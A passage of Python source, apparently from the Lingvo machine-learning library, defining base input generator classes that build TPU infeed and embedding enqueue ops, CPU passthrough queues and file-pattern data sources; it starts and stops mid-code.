'concurrent inflight remote input fetches per remote target.')
p.Define(
'input_stats_summary_interval_steps', 10,
'Number of steps in between logging of TF scalar summaries for '
'training related input data stats.')
p.Define(
'tpu_embedding_mode', 'train',
'The mode used to enqueue TPU embedding ids. Valid values are: {'
'None: no TPU embedding enqueue ops will be generated; '
'"inference": enqueue ops will be generated, but backprop will be '
'disabled (i.e. no gradient will be generated and the embedding '
'tables are freezed); '
'"train": both enqueue ops and gradient will be generated when '
'do_eval is False, otherwise fallback to "inference" mode; }.')
return p
def __init__(self, params):
super().__init__(params)
# parameter to tell the bprop one hot for all the files.
# TODO(ankurbpn): Initialize when using sources from mixed record yielders.
self._bprop_onehot = tf.constant([1], dtype=tf.float32)
# Each entry is a regular expression specifying the set of variables
# to bprop per data source.
self._bprop_variable_filters = ['']
# For TPU enqueue ops, we do not use graph collections, instead, we rely
# on this member variable. This is especially useful for
# executor-driven multiple programs, as we need more fine-grained
# access to drive the infeed for a specific program, rather than
# a single global collection across the graph.
self._tpu_infeed_op = None
# A list of InfeedQueues.
self._tpu_queues = []
# Set to true in GetPreprocessedInputBatch() (and thus _InputBatch())
self._in_get_processed_input_batch = False
# Merged TF scalar summaries for training related input data stats.
self._merged_input_data_summary_op = None
# Tensorboard layout for charts displaying input data stats.
self._input_data_summary_layout = None
assert self.params.tpu_embedding_mode in [None, 'train', 'inference']
self._tpu_embedding_mode = self.params.tpu_embedding_mode
if self._tpu_embedding_mode == 'train' and self.do_eval:
self._tpu_embedding_mode = 'inference' # Always disable backprop in eval.
if self.parent:
# Set the TPU embedding mode for the task. This need to happen in __init__
# so that the mode is available when the bprop graph is built (note that
# CreateTpuEmbeddingEnqueueOps() is called *after* building bprop graph).
tpu_embedding_collection = (
tpu_embedding_layers.TpuEmbeddingCollection.Get())
tpu_embedding_collection.SetTaskMode(
py_utils.TaskCallScopeName(self.parent), self._tpu_embedding_mode)
self.CreateDatasource()
def CreateDatasource(self):
if self.params.file_datasource:
self.CreateChild('datasource', self.params.file_datasource)
self.datasource.SetInputGenerator(self)
def CommonInputOpArgs(self):
"""Common input params."""
return {}
def GetBpropVariableFilters(self):
return self._bprop_variable_filters
def GetInputSourceOneHot(self):
"""Get the current bprop type of the input generator batch."""
return self._bprop_onehot
def GlobalBatchSize(self):
"""Returns the total batch size (for stats), int or dynamic int tensor."""
# Uses `InfeedBatchSize()` instead of calculating it from `p.batch_size`
# because the behavior would be overridden by subclasses.
global_batch_size = batch_utils.scale_infeed_to_global(
self.InfeedBatchSize(), self.params.use_per_host_infeed)
tf.logging.info('GlobalBatchSize {}'.format(global_batch_size))
return global_batch_size
def InfeedBatchSize(self):
"""Returns the batch size of the input batch: int or dynamic int tensor."""
batch_per_input = batch_utils.scale_split_to_infeed(
self.params.batch_size, self.params.use_per_host_infeed)
tf.logging.info('batch_per_input: %d', batch_per_input)
return batch_per_input
def Initialize(self, sess):
"""Initialize using a session."""
if 'datasource' in self.children:
self.datasource.Initialize(sess)
def _InputBatch(self):
"""The current input batch, not preprocessed.
This is meant to be overridden by subclasses, but not called directly.
Callers should use `GetPreprocessedInputBatch()`.
Returns:
A NestedMap (or list of NestedMaps when using TPU sharded infeed) of
input tensors.
"""
raise NotImplementedError('Abstract method')
def _PreprocessInputBatch(self, batch):
"""Preprocesses input batch from _InputBatch.
Args:
batch: A NestedMap (or list of NestedMaps when using TPU sharded infeed)
containing input tensors in the format returned by _InputBatch.
Returns:
A NestedMap containing preprocessed inputs to feed to the model.
"""
return batch
def GetPreprocessedInputBatch(self):
"""Returns preprocessed batch of inputs.
These are the actual inputs fed to the model.
Subclasses generally should not override this function directly. Instead,
override _InputBatch and maybe _PreprocessInputBatch.
"""
self._in_get_processed_input_batch = True
# TODO(b/139345706): Use self.datasource.GetNext() for all datasource.
if ('datasource' in self.children and
isinstance(self.datasource, datasource.TFDatasetSource)):
if self.cluster.input_targets:
raise ValueError(
'TFDatasetSource subclassed DataSources do not support using '
'train_input_replica. Try tf_data_service_replicas instead.')
# pylint: disable=protected-access
if ((self._InputBatch.__func__ is not BaseInputGenerator._InputBatch and
self._InputBatch.__func__
is not BaseInputGeneratorFromFiles._InputBatch) or
self._PreprocessInputBatch.__func__
is not BaseInputGenerator._PreprocessInputBatch):
# pylint: enable=protected-access
# If you hit this error trying to run with --tf_data_service_replicas,
# try to refactor your input generator by moving all the code inside
# _InputBatch and _PreprocessInputBatch to _DataSourceFromFilePattern.
raise ValueError(
'Batches obtained through p.file_datasource do not go through '
'self._InputBatch() or self._PreprocessInputBatch(). To reduce the '
'potential of mistakes, this error is raised when either of those '
'functions have been overridden.')
batch = self.datasource.GetNext()
else:
batch = self._PreprocessInputBatch(self._InputBatch())
self._in_get_processed_input_batch = False
if py_utils.GetUnitTestSession():
self.Initialize(py_utils.GetUnitTestSession())
return batch
@property
def tpu_number_of_shards(self):
"""Number of shards to split the input batch into."""
p = self.params
num_tpu_hosts = self.cluster.num_tpu_hosts
num_infeed_hosts = num_tpu_hosts if p.use_per_host_infeed else 1
shards = (self.cluster.total_worker_devices // num_infeed_hosts)
if p.use_partitioned_infeed_queue or not p.use_per_core_infeed:
shards = shards // self.cluster.num_devices_per_split
return shards
def CreateTpuEnqueueOps(self, job_name=None):
"""Create the host-side enqueue ops.
This should be called in an outer non-TPU context.
Args:
job_name: the name of the job on which the enqueue operations run.
"""
if not py_utils.IsEagerMode():
assert not self._tpu_queues, (
'CreateTpuEnqueueOps should only be called once.')
self._tpu_queues = []
self._per_host_batches = []
self._per_host_emb_batches = []
# A list of lists, where the [i][j] element is the j-th passthrought batch
# of the i-th task. Each task will have more than one passthrought batch iff
# sharded infeed is used.
self._per_host_passthrough_batches = []
p = self.params
num_tpu_hosts = self.cluster.num_tpu_hosts
num_cores_per_host = self.cluster.total_worker_devices // num_tpu_hosts
tf.logging.info(
'CreateTpuEnqueueOps num_splits_per_client={} '
'num_devices_per_split={} num_tpu_hosts={} use_per_host_infeed={}'
.format(self.cluster.num_splits_per_client,
self.cluster.num_devices_per_split, num_tpu_hosts,
p.use_per_host_infeed))
assert num_tpu_hosts > 0, ('num_tpu_hosts: %d' % num_tpu_hosts)
if p.use_per_core_infeed:
if (not p.use_per_host_infeed) or p.use_partitioned_infeed_queue:
raise ValueError('use_per_core_infeed need to have use_per_host_infeed '
'but not use_partitioned_infeed_queue.')
if p.num_partitions is None or p.num_partitions <= 1:
raise ValueError('use_per_core_infeed needs num_partitions > 1.')
if (self.cluster.num_devices_per_split > num_cores_per_host and
(p.use_per_host_infeed and not p.use_per_core_infeed)):
tf.logging.fatal('Doesn\'t support per host infeed mode when '
'num_devices_per_split({}) > num_cores_per_host({}).'
'Each host must be able to accommodate >= 1 split when '
'using per_host_infeed.'.format(
self.cluster.num_devices_per_split,
num_cores_per_host))
shards = self.tpu_number_of_shards
tf.logging.info('shards {}'.format(shards))
input_ops_list = []
cpu_passthrough_keys = self.GetCpuPassthroughKeys()
num_infeed_hosts = num_tpu_hosts if p.use_per_host_infeed else 1
tf.logging.info('num_infeed_hosts: %d', num_infeed_hosts)
host_devices = self.cluster.ListDevices(self.cluster.job_spec).flatten()
if p.use_per_host_infeed and num_infeed_hosts != len(host_devices):
raise ValueError(
f'Configuration mismatch, number of infeed hosts {num_infeed_hosts} '
f'does not match available devices {host_devices}.')
for task_id in range(num_infeed_hosts):
host_device = host_devices[task_id]
if cpu_passthrough_keys and (
'/task:{}/device:CPU:0'.format(task_id) not in host_device):
raise ValueError(
f'CPU passthrough configuration mismatch, device {host_device} '
f'does not match task id {task_id}.')
with tf.device(host_device), cluster.InfeedContextScope(
infeed_host_index=task_id, num_infeed_hosts=num_infeed_hosts):
batch = self.GetPreprocessedInputBatch()
if not isinstance(batch, (list, tuple)):
batch = [batch]
cur_passthrough_batches = []
for i in range(len(batch)):
b = batch[i]
assert isinstance(b, py_utils.NestedMap)
# Hack: bucket_keys and xxx.bucket_keys are not needed on TPU.
# Note that when MultiTaskData is used, bucket_keys will be at the
# second level of the dictionary.
b = b.FilterKeyVal(lambda k, _: not k.endswith('bucket_keys'))
# Split out any keys that are meant for CPU passthrough only.
cur_passthrough_batches.append(
b.FilterKeyVal(lambda k, _: k in cpu_passthrough_keys))
b = b.FilterKeyVal(lambda k, _: k not in cpu_passthrough_keys)
batch[i] = b
if i > 0:
# If the input batch is already sharded, check that the shards are
# compatible with each other.
assert py_utils.IsCompatible(b, batch[0])
self._per_host_passthrough_batches.append(cur_passthrough_batches)
tf.logging.info('CPU passthrough keys: %s', cpu_passthrough_keys)
if p.filter_sparse_tensors:
# Make a copy of this host's input batch, then filter out any
# SparseTensor features. This way, SparseTensor features are not fed
# into the TPU InfeedQueue (and only to TPUEmbedding).
# TODO(jeffreyzhao): Hack, come up with better solution.
# Ideally we would like users to override
# CreateTpuEmbeddingEnqueueOps() to modify the input batch
# and remove fields they don't want to enqueue onto TPU.
# However, the TPUEmbedding singleton and TPU embedding enqueue ops
# are currently constructed after CreateTpuEnqueueOps() is called.
emb_batch = []
new_batch = []
for i, b in enumerate(batch):
emb_batch.append(
b.Filter(lambda v: isinstance(v, tf.sparse.SparseTensor)))
new_batch.append(
b.Filter(lambda v: not isinstance(v, tf.sparse.SparseTensor)))
self._per_host_emb_batches.append(emb_batch)
batch = new_batch
self._batch_nm_types = batch[0]
tf.logging.info('host_device: %s, batch: %r', host_device, batch)
self._per_host_batches.append(batch)
for b in batch:
for k, x in b.FlattenItems():
assert x.shape.is_fully_defined(), (
'Shape must be fully defined: %s: %s' % (k, x))
# TODO(cwhipkey): if it's a string (or other type not supported on
# TPU), drop it from feeding and on the other end add in an op that
# fails if used.
shapes = batch[0].Transform(lambda x: x.shape).Flatten()
dtypes = batch[0].Transform(lambda x: x.dtype).Flatten()
tf.logging.info('host_device: %s infeed shapes: %r', host_device,
shapes)
tf.logging.info('host_device: %s infeed dtypes: %r', host_device,
dtypes)
if p.use_partitioned_infeed_queue:
device_assignment = py_utils.GetTpuDeviceAssignment(job_name)
host_device = device_assignment.host_device(
replica=0, job=tf.flags.FLAGS.tf_master)
host_id = int(host_device.split('/task:')[1].split('/device:')[0])
tf.logging.info('host_id: {} host_device: {}'.format(
host_id, host_device))
q = tpu_feed._PartitionedInfeedQueue( # pylint: disable=protected-access
number_of_tuple_elements=len(dtypes),
device_assignment=device_assignment,
host_id=host_id,
input_partition_dims=[
[p.num_partitions] + [1] * (len(s) - 1) for s in shapes
],
tuple_types=dtypes,
tuple_shapes=shapes)
else:
if p.use_per_core_infeed:
q = tpu_feed.InfeedQueue(
tuple_types=dtypes,
tuple_shapes=shapes,
number_of_partitions=p.num_partitions)
elif len(batch) > 1:
# When the input batch is sharded, the unsharded dtypes and shapes
# will be determined later by the generate_enqueue_ops() call.
q = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(batch[0].Flatten()))
else:
q = tpu_feed.InfeedQueue(tuple_types=dtypes, tuple_shapes=shapes)
assert shards is not None
q.set_number_of_shards(shards)
self._tpu_queues.append(q)
if p.use_partitioned_infeed_queue:
assert len(batch) == 1
input_ops = q.generate_enqueue_ops([batch[0].Flatten()])
elif p.use_per_host_infeed:
# TODO(ylc/zhifengc): Add this to a policy module and test it.
def TPUOrdinalFunction(shard_index_in_host):
if p.use_per_core_infeed:
return shard_index_in_host
device_assignment = py_utils.GetTpuDeviceAssignment()
if device_assignment:
# We put both enqueue/dequeue ops at core 0 in each replica.
replica = device_assignment.lookup_replicas(
task_id, 0)[shard_index_in_host] # pylint: disable=cell-var-from-loop
return device_assignment.tpu_ordinal(replica=replica)
else:
return shard_index_in_host
if len(batch) > 1:
# In this case, the `shard_index_in_host` argument of
# `TPUOrdinalFunction` is the index of a sharded batch in the
# `batch` list.
input_ops = q.generate_enqueue_ops(
[b.Flatten() for b in batch],
placement_function=lambda x: host_device, # pylint: disable=cell-var-from-loop
tpu_ordinal_function=TPUOrdinalFunction)
else:
input_ops = q.split_inputs_and_generate_enqueue_ops(
batch[0].Flatten(),
placement_function=lambda x: host_device, # pylint: disable=cell-var-from-loop
tpu_ordinal_function=TPUOrdinalFunction)
else:
assert len(batch) == 1
input_ops = q.split_inputs_and_generate_enqueue_ops(
batch[0].Flatten(),
device_assignment=py_utils.GetTpuDeviceAssignment(job_name))
input_ops_list += input_ops
tf.logging.info('input_ops_list %s', input_ops_list)
grouped_infeed_op = tf.group(*input_ops_list)
self._tpu_infeed_op = []
for _ in range(p.tpu_infeed_parallelism):
self._tpu_infeed_op.append(grouped_infeed_op)
def TpuDequeueBatch(self):
"""Create TPU dequeue ops.
This should only be called within a TPU context.
Returns:
- A NestedMap of the input batch.
"""
assert self._tpu_queues, 'CreateTpuEnqueueOps must be called first.'
with tf.device(tf.tpu.core(0)):
# Note that the dequeue_tuple op on the TPU core
# only cares about the shape/types being dequeued
# which is why this is hard-coded to the first Queue.
tensors = self._tpu_queues[0].generate_dequeue_op()
return self._batch_nm_types.Pack(tensors)
def CreateTpuEmbeddingEnqueueOps(self):
"""Creates the TpuEmbedding enqueue ops on all hosts.
Note that this must be called after the instantiation of the
monolithic TPUEmbeddingLayer.
"""
p = self.params
if self._tpu_embedding_mode is None:
return
tpu_embedding_collection = tpu_embedding_layers.TpuEmbeddingCollection.Get()
tpu_embedding = tpu_embedding_collection.tpu_embedding
if not tpu_embedding:
return
num_tpu_hosts = self.cluster.num_tpu_hosts
num_infeed_hosts = num_tpu_hosts if p.use_per_host_infeed else 1
input_batches = (
self._per_host_emb_batches
if p.filter_sparse_tensors else self._per_host_batches)
assert len(input_batches) == num_infeed_hosts
enqueue_ops = []
if num_tpu_hosts > 1 and not p.use_per_host_infeed:
batch = input_batches[0]
assert len(batch) == 1, "Tpu Embedding doesn't support sharded inputs."
with tf.device('/task:0/device:CPU:0'):
batch = self.PreprocessTpuEmbeddingInputBatch(batch[0])
# When not using per-host infeed, we use `self.tpu_number_of_shards`
# when splitting the inputs, so `num_tpu_hosts` is taken into account.
all_enqueue_data = self._GetTpuEmbeddingEnqueueData(
tpu_embedding, batch, self.tpu_number_of_shards)
# Translate replica index to (host_device, tpu_ordinal). The mechanism
# need to be the same as the one for other tpu infeed, so that the same
# split of tpu-embedding and non-tpu-embedding inputs are sent to the
# same core. See CreateTpuEnqueueOps() for more details.
num_cores_per_host = tpu_embedding.num_cores_per_host
enqueue_data_per_host = {}
device_assignment = py_utils.GetTpuDeviceAssignment()
for replica_index, per_replica_data in enumerate(all_enqueue_data):
host_device = device_assignment.host_device(replica=replica_index)
core = device_assignment.tpu_ordinal(replica=replica_index)
assert core < num_cores_per_host
if host_device not in enqueue_data_per_host:
enqueue_data_per_host[host_device] = [None] * num_cores_per_host
assert enqueue_data_per_host[host_device][core] is None
enqueue_data_per_host[host_device][core] = per_replica_data
assert len(enqueue_data_per_host) == num_tpu_hosts
for host_device, src_enqueue_data in enqueue_data_per_host.items():
with tf.device(host_device):
# TF's `TPUEmbedding` colocates the enqueue ops with the input
# tensors, so we add a tf.identity here to ensure they are copied to
# `host_device` before generating the enqueue ops.
dst_enqueue_data = [
{} for _ in range(tpu_embedding.num_cores_per_host)
]
# src_enqueue_data is a list of dicts, one for each core.
for i, data_dict in enumerate(src_enqueue_data):
assert data_dict, src_enqueue_data
for key, data in data_dict.items():
dst_enqueue_data[i][key] = tpu_embedding_lib.EnqueueData(
embedding_indices=tf.identity(data.embedding_indices),
sample_indices=tf.identity(data.sample_indices)
if data.sample_indices is not None else None,
aggregation_weights=tf.identity(data.aggregation_weights)
if data.aggregation_weights is not None else None)
tf.logging.info('host_device: %s, enqueue_data: %r', host_device,
dst_enqueue_data)
enqueue_ops += tpu_embedding.generate_enqueue_ops(
dst_enqueue_data, mode_override=self._tpu_embedding_mode)
else:
assert tpu_embedding.num_cores_per_host == self.tpu_number_of_shards
for task_id in range(num_tpu_hosts):
host_device = '/task:{}/device:CPU:0'.format(task_id)
batch = input_batches[task_id]
assert len(batch) == 1, "Tpu Embedding doesn't support sharded inputs."
with tf.device(host_device):
batch = self.PreprocessTpuEmbeddingInputBatch(batch[0])
tf.logging.info('host_device: %s, batch: %r', host_device, batch)
enqueue_data = self._GetTpuEmbeddingEnqueueData(
tpu_embedding, batch, tpu_embedding.num_cores_per_host)
enqueue_ops += tpu_embedding.generate_enqueue_ops(
enqueue_data, mode_override=self._tpu_embedding_mode)
self._tpu_infeed_op.append(tf.group(*enqueue_ops))
def _GetTpuEmbeddingEnqueueData(self, tpu_embedding, input_batch, num_splits):
"""Get a list of per-core TPU embedding enqueue data.
Args:
tpu_embedding: The monolithic TpuEmbedding object.
input_batch: The input batch used to generate the enqueue data.
num_splits: The number of shards to split the inputs into in order to get
per-core inputs, before generating enqueue data.
Returns:
A list of `num_splits` enqueue elements, where each element is a dict of
feature_name -> `tpu_embedding_lib.EnqueueData`.
"""
assert isinstance(input_batch, py_utils.NestedMap)
tpu_emb_input_keys = list(tpu_embedding.feature_to_config_dict.keys())
tf.logging.info('tpu_emb_input_keys: %r', tpu_emb_input_keys)
enqueue_data = [{} for _ in range(num_splits)]
# Get enqueue data for each replica.
for key in tpu_emb_input_keys:
feat = input_batch.GetItem(key)
if isinstance(feat, tf.sparse.SparseTensor):
tpu_emb_feat_splitted = tf.sparse.split(feat, num_splits, axis=0)
for i, split in enumerate(tpu_emb_feat_splitted):
enqueue_data[i][key] = (
tpu_embedding_lib.EnqueueData.from_sparse_tensor(split))
else:
tpu_emb_feat_splitted = tf.split(feat, num_splits)
for i, split in enumerate(tpu_emb_feat_splitted):
# Dense to sparse. Note the assumption of a padding id.
sample_indices = tf.where(tf.not_equal(split, -1))
embedding_indices = tf.gather_nd(split, sample_indices)
enqueue_data[i][key] = tpu_embedding_lib.EnqueueData(
embedding_indices, sample_indices)
return enqueue_data
def PreprocessTpuEmbeddingInputBatch(self, input_batch):
"""Hook to manipulate the TPU embedding input batch.
Used by CreateTpuEmbeddingEnqueueOps(). Override this method in input
generators to preprocess the TPU embedding inputs before using them to
generate enqueue ops.
Args:
input_batch: The input batch to process.
Returns:
The preprocessed TPU embedding input batch.
"""
return input_batch
def GetCpuPassthroughKeys(self):
"""Return a list of keys from the input to skip sending to the device.
When running on TPU, a user may want to avoid sending some inputs to the
device; either the type is not supported (e.g., string), or the input will
not be processed on the device at all. However, these items may be still
useful to passthrough to the "output", e.g., for decoding purposes.
This function should return a list of keys from InputBatch() that should not
be sent to the TPU, but can be combined with the outputs of Decode() before
passing to PostProcessDecodeOut().
Returns:
A list of keys from the input to filter from being sent to the device,
which may be combined with the output of Decode() prior to
PostProcessDecodeOut().
"""
return []
def CreateCpuPassthroughEnqueueOps(self):
"""Creates enqueue ops to pass through CPU inputs to the output."""
p = self.params
num_tpu_hosts = self.cluster.num_tpu_hosts
num_infeed_hosts = num_tpu_hosts if p.use_per_host_infeed else 1
cpu_passthrough_keys = self.GetCpuPassthroughKeys()
if not cpu_passthrough_keys:
return
# There is one enqueue op per host.
self._host_queues = {}
enqueue_ops = []
assert len(self._per_host_batches) == num_infeed_hosts
for task_id in range(num_infeed_hosts):
host_device = '/task:{}/device:CPU:0'.format(task_id)
batch = self._per_host_passthrough_batches[task_id]
assert isinstance(batch, list)
with tf.device(host_device):
self._cpu_nm_types = batch[0] if len(batch) == 1 else batch
tf.logging.info('host_device CPU passthrough types: %s, batch: %r',
host_device, batch)
cpu_dtypes = py_utils.Flatten(
py_utils.Transform(lambda x: x.dtype, batch))
# NOTE: we use a large capacity queue under the assumption that the size
# of these tensors will be generally smaller than that sent to the TPU,
# and that the TPU queue will likely fill up before the host queue,
# blocking further enqueues.
host_queue = tf.queue.FIFOQueue(capacity=10000, dtypes=cpu_dtypes)
self._host_queues[task_id] = host_queue
enqueue_ops += [host_queue.enqueue(py_utils.Flatten(batch))]
self._tpu_infeed_op.append(tf.group(*enqueue_ops))
def DequeueCpuPassthrough(self, concat=True):
"""Create CPU dequeue ops.
Args:
concat: Whether to concat the passthrough batches for each host into one
batch.
Returns:
None if there are no CPU passthrough values. Otherwise, a NestedMap of the
CPU passthrough input batch if `concat`, or a list of NestedMaps (one for
each host) if not `concat`.
"""
cpu_passthrough_keys = self.GetCpuPassthroughKeys()
if not cpu_passthrough_keys:
return None
p = self.params
num_tpu_hosts = self.cluster.num_tpu_hosts
num_infeed_hosts = num_tpu_hosts if p.use_per_host_infeed else 1
tensor_list = []
for task_id in range(num_infeed_hosts):
with tf.device('/task:{}/device:CPU:0'.format(task_id)):
tensors = self._host_queues[task_id].dequeue()
# Make list if only one tensor.
if not isinstance(tensors, list):
tensors = [tensors]
tensor_list.append(tensors)
# TODO(laigd): consider moving the concat logic out to make the API simpler.
if concat:
with tf.device('/task:0/device:CPU:0'):
# Transpose to get per-dequeue-element tuples, then concat.
result = list(map(lambda xs: tf.concat(xs, axis=0), zip(*tensor_list)))
return py_utils.Pack(self._cpu_nm_types, result)
# Return a list of batches, one per host.
return [py_utils.Pack(self._cpu_nm_types, xs) for xs in tensor_list]
@property
def tpu_infeed_op(self):
if self._tpu_infeed_op is not None:
return self._tpu_infeed_op
else:
raise ValueError('TPU infeed op not set. Call CreateTpuEnqueueOps first.')
@property
def merged_input_data_summary_op(self):
return self._merged_input_data_summary_op
@property
def input_data_summary_layout(self):
return self._input_data_summary_layout
def SplitInputBatch(self, num_splits):
"""Splits the current InputBatch into num_splits ways.
Args:
num_splits: The number of splits.
Returns:
A list of `.NestedMap`. Each `.NestedMap` represents the input
tensors in one split.
"""
assert num_splits >= 1
batch = self.GetPreprocessedInputBatch()
if num_splits == 1:
# Special case. No split is needed.
return [batch]
assert not py_utils.use_tpu()
field_split = ig_helper.SplitTensors(batch.Flatten(), num_splits)
num_fields = len(field_split)
ret = []
for j in range(num_splits):
split_flatten = [field_split[i][j] for i in range(num_fields)]
split = batch.Pack(split_flatten)
ret += [split]
return ret
def Reset(self, sess):
"""Reset the input-generator.
Override so that the input_generator reproduces examples as if from a fresh
instantiation.
Args:
sess: A tensorflow session.
"""
raise NotImplementedError()
@property
def _map_args(self):
"""Default args for tf.data.DataSet.map()."""
return {
'num_parallel_calls':
1 if self.cluster.in_unit_test else tf.data.experimental.AUTOTUNE,
'deterministic':
self.cluster.require_sequential_input_order
}
def FilePatternToDataSource(p):
"""Helper to turn p.file_pattern (deprecated) into p.file_datasource."""
if isinstance(p.file_pattern, str):
ds = datasource.SimpleDataSource.Params().Set(file_pattern=p.file_pattern)
elif isinstance(p.file_pattern, (list, tuple)):
if all([isinstance(x, str) for x in p.file_pattern]):
# While this violates the documentation and intended use, there are
# subclasses that have used a tuple of strings, rather than a list of
# string, weight tuples. Rather than treating lists and tuples
# differently, support both here until p.file_pattern is removed.
ds = datasource.SimpleDataSource.Params().Set(
file_pattern=list(p.file_pattern))
elif p.use_within_batch_mixing:
if max(list(map(len, p.file_pattern))) >= 3:
# Within batch mixing doesn't work with backprop filters, i.e. when
# file_pattern param contains a list of
# <file_pattern, weight, [bprop_variable_filter]> tuples.
raise ValueError('Expected a list of pairs, got %s' % p.file_pattern)
file_patterns, weights = (list(x) for x in zip(*p.file_pattern))
ds = datasource.SimpleDataSource.Params().Set(
file_pattern=file_patterns, weights=weights)
else:
# Otherwise fall back to MixByWeight-based approach.
datasources = []
weights = []
bprop_variable_filters = []
for source_id, input_entry in enumerate(p.file_pattern):
if isinstance(input_entry, str):
raise ValueError('Should explicitly specify weights, got string: %s' %
input_entry)
file_pattern, weight = input_entry[:2]
datasources.append(
datasource.SimpleDataSource.Params().Set(file_pattern=file_pattern))
# This is essentially a bug fix, but we only enable it based on this
# param to maintain backward compatibility.
if not p.all_zero_source_id_without_within_batch_mixing:
# SimpleDataSource will output source_id=0. We use source_id_offset
# to correct this.
datasources[-1].Set(source_id_offset=source_id)
weights.append(weight)
bprop_variable_filter = input_entry[2] if len(input_entry) > 2 else ''
bprop_variable_filters.append(bprop_variable_filter)
ds = datasource.CrossBatchMixingDataSource.Params().Set(
sub=datasources,
weights=weights,
bprop_variable_filters=bprop_variable_filters)
else:
raise ValueError('Cannot parse p.file_pattern into a datasource.')
if cluster_factory.Current().tf_data_service_address:
bucket_upper_bound = None
if 'bucket_upper_bound' in p:
bucket_upper_bound = p.bucket_upper_bound
ds = datasource.TFDataServiceSource.Params().Set(
sub=ds, bucket_upper_bound=bucket_upper_bound)
ds = datasource.TFDatasetPrefetch.Params().Set(sub=ds)
return ds
class BaseInputGeneratorFromFiles(BaseInputGenerator):
"""Base class for input generators that reads from files.
Subclasses should implement _DataSourceFromFilePattern.
"""
@classmethod
def Params(cls):
"""Defaults params for input generators."""
p = super().Params()
p.Define(
# NOTE: file_pattern is deprecated. New params should use
# file_datasource instead.
# TODO(b/139345706) remove file_pattern parameter
'file_pattern',
'',
'A single file pattern string, a list of file pattern strings or a list'
' of <file_pattern, weight> pairs or a list of <file_pattern, weight, '
'bprop_variable_filter> tuples. Some of the cases may not be supported '
'with use_within_batch_mixing, where probablistic samples are from the '
'inputs proportional to their weights. Typically, values are binary '
'protocol buffers containing train/eval samples. Keys are not used.')
p.Define('file_random_seed', 301,
'Random seed for shuffling the input data.')
p.Define(
'file_buffer_size', 10000,
'How many records are buffered for random shuffling. This param '
'affects how much RAM a train/test job needs. E.g., if an average '
'record is about 500KB, the buffer needs 5GB ram.')
p.Define(
'file_buffer_size_in_seconds', 0,
'If non-zero, keep enough records in the buffer to handle N seconds '
'worth of demand. E.g., if the training job is reading 1000 records '
'per second and this parameter is set to 10, the buffer is resized '
'to contain 10000 records. This parameter is useful when reading from '
'many data sources at different speeds, as it automatically tunes the '
'size of buffers to fit demand. The file_buffer_size parameter is an '
'upper bound to the buffer size.')
p.Define('file_parallelism', 16, 'How many files to read concurrently.')
p.Define(
'flush_every_n', 0, 'If non-zero, flushes all batches buffered '
'so far every these many records are yielded.')
p.Define('num_batcher_threads', 1, 'Number of threads to use for input '
'record batcher.')
p.Define(
'repeat_count', -1,
'Number of repetitions of a dataset before throwing OutOfRange error '
'when using require_sequential_input_order. Must only be set if '
'cluster.require_sequential_input_order is True.')
# TODO(b/139345706) when file_pattern is deleted use_within_batch_mixing
# will be specified by setting weights in SimpleDataSource in
# p.file_datasource and this param should be deleted as well.
p.Define(
'use_within_batch_mixing', False, 'Whether to mix records from '
'different input sources within batch or across batches (the '
'default option). This option only takes effect when file_pattern'
' is a list of file patterns with weights. Note: without mixing, all'
' source_id values for records will be set to 0 unless '
'all_zero_source_id_without_within_batch_mixing is set to False.')
p.Define(
'all_zero_source_id_without_within_batch_mixing', True,
'When set (by default) and use_within_batch_mixing is false, all '
'record.source_id values returned will be 0. This is most likely '
'undesired behavior, but enables backwards compatibility with previous '
'work. Only classes that have _DataSourceFromFilePattern take a '
'input_source_id_offset argument can handle this flag being False.')
return p
def __init__(self, params):
if params.use_per_host_infeed and params.file_random_seed != 0:
raise ValueError('file_random_seed needs to be 0 when '
'use_per_host_infeed == True.')
super().__init__(params)
def CreateDatasource(self):
p = self.params
assert not (
p.file_pattern and p.file_datasource
), 'Only one of file_pattern and file_datasource can be specified'
if not p.file_datasource:
p.file_datasource = FilePatternToDataSource(p)
# TODO(b/139345706) remove support for file_pattern
# p.file_pattern = ''
super().CreateDatasource()
def CommonInputOpArgs(self):
"""Common input params."""
p = self.params
args = super().CommonInputOpArgs()
num_input_replicas = 1
input_replica_id = 0
infeed_context = cluster.GetInfeedContext()
if infeed_context:
num_input_replicas = infeed_context.num_infeed_hosts
input_replica_id = infeed_context.infeed_host_index
tf.logging.info('input_replica_id=%s/%s', input_replica_id,
num_input_replicas)
# Legacy behavior for Lingvo input ops: require_sequential_order defaults to
# False for eval jobs. Note that this value is different from
# self.cluster.require_sequential_input_order.
require_sequential_order = bool(
self.cluster.params.require_sequential_input_order)
args.update({
'file_random_seed': p.file_random_seed,
'file_buffer_size': p.file_buffer_size,
'file_parallelism': p.file_parallelism,
'file_buffer_size_in_seconds': p.file_buffer_size_in_seconds,
'flush_every_n': p.flush_every_n,
'num_threads': p.num_batcher_threads,
'require_sequential_order': require_sequential_order,
'repeat_count': p.repeat_count,
'num_input_replicas': num_input_replicas,
'input_replica_id': input_replica_id,
})
args.update(self._InputOpBucketingArgs())
return args
def _InputOpBucketingArgs(self):
return {
'bucket_upper_bound': [1000000],
'bucket_batch_limit': [self.InfeedBatchSize()],
'bucket_adjust_every_n': 0,
}
def _InputBatch(self):
return self._BuildDataSource()
# TODO(b/139345706): After p.file_pattern is deleted, the following functions
# _DataSourceFromFilePattern, _BuildDataSourceWithMetadata, _BuildDataSource
# can be deleted and functionality moved to using the DataSource directly.
def _DataSourceFromFilePattern(self,
file_pattern,
input_source_weights=None,
input_source_id_offset=0):
"""Return a NestedMap containing an input batch from a string file_pattern.
Subclasses should implement this function.
Args:
file_pattern: A string file pattern.
input_source_weights: A list of float input source weights to control
input example mix in the batch. The records will be sampled from inputs
proportionally to these weights. Defaults to None which should be
treated as an empty list.
input_source_id_offset: All source_ids returned from datasource will be
offset by this value.
Returns:
A `.NestedMap` of tf.Tensors containing a batch of input data with shapes
[batch, ...].
"""
return py_utils.NestedMap(x=tf.zeros([1]))
def _BuildDataSourceWithMetadata(self):
"""Read and return input batch from `p.file_pattern`.
`p.file_pattern` may be a string file_pattern or a
list of (file_pattern, weight, [bprop_variable_filter]) tuples.
bprop_variable_filter is optional. When bprop_variable_filter is used,
batches will always contain the examples from the same source. Otherwise,
examples from different sources may be mixed together.
Returns:
A `.NestedMap` containing
- data: `.NestedMap` of tf.Tensor as in `_DataSourceFromFilePattern()`.
- source_selected: optional tensor of size [batch_size, #datasources].
- selected_bprop: optional tensor of size [#datasources].
- bprop_variable_filters: optional list of filters for each source.
Raises:
ValueError: If file_datasource is not set
"""
p = self.params
if p.use_per_host_infeed and not self._in_get_processed_input_batch:
raise ValueError(
